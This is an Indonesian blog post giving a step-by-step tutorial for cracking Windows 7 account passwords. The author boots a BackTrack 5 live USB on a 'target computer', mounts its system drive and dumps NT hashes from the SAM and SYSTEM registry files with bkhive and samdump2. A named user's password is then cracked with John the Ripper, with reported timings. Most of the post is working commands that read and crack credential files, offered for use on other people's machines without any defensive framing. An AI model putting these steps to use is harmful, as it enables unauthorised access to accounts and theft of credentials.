Ini merupakan posting saya yang pertama yang membahas tentang cracking. Walaupun sebenarnya saya sudah lumayan banyak posting tentang cracking pssword di blog lama saya. Pada saat cracking ini saya menggunakan Backtrack 5 yang baru saja rilis, yang tentu saja sudah disertai dengan paket-paket powerfull yang digunakan untuk cracking dan hacking.
Disini saya menggunakan 3 buah software/aplikasi, yang semua nya berjalan pada shell/CLI. Yaitu bkhive, samdump2 dan John The Ripper (tentu saja semua aplikasi ini sudah tersedia di dalam distro BT5). Jika anda menggunakan linux selain BT5, silahkan anda instal terlebih dulu ke tiga aplikasi tersebut. BT5 yang saya gunakan adalah Live USB. Sehingga tinggal colok di komputer target dan booting via USB, dan masuk ke Bt5. Okey langsung saja.
Saya anggap anda sudah punya Backtrack 5 atau Linux distro lain yang sudah diinstall dengan bkhive, samdump2 dan John The Ripper.
Langkah awal yang harus anda lakukan adalah booting Komputer ke Backtrack. Dan masuk ke Backtrack. Sampai muncul :
root@root: ~#
Kemudian ketik :
root@root: ~# startx
Setelah itu akan muncul Desktop Backtrack 5. Setelah muncul jendela desktop, buka Shell dan lakukan mount terhadap hardisk drive C, dimana Windows 7 di install. Cara mount.
root@root: ~# mkdir /media/disk
root@root: ~# mount /dev/sda1 /media/disk
sda1 adalah hardisk (drive C:\) dimana Windows 7 terinstall, sesuaikan dengan Komputer anda. Kemudian ketik:
root@root: ~# bkhive /media/disk/Windows/System32/config/SYSTEM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM
root@root: ~# samdump2 /media/disk/Windows/System32/config/SAM SAM > hash.txt
File Hash password sudah dibuat, sekarang masuk ke direktori John The Ripper untuk melakukan cracking password.
root@root: ~# cd /pentest/passwords/john/
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT -i=alnum /root/hash.txt
Cracking Password Win7
Harusnya hasil cracking seperti pada gambar diatas. Pada gambar diatas saya hanya melakukan cracking password pada satu user (Ofidz). Dan menggunakan charset alpha numeric (-i=alnum) untuk mempercepat cracking. Jika password yang akan di crack susah atau mengandung karakter selain alnum, sebaiknya parameter ini jangan dipakai. Hanya dibutuhkan waktu 56 detik untuk memecahkan password user Ofidz.
Cracking Password Win7 Tanpa Parameter Charset
Tanpa charset alnum:
root@root: /pentest/passwords/john# john --users=Ofidz --format=NT /root/hash.txt
Jika tidak menggunakan parameter Charset, waktu yang dibutuhkan lebih lama lagi, yaitu 13:40. Semakin rumit dan panjang password yang di cracking, maka akan semakin lama proses cracking ini berlangsung. RAM dan Prosessor komputer juga berpengaruh pada kecepatan cracking.
Like this:
Like Loading...
Dark Side
Jurnal Seorang IT 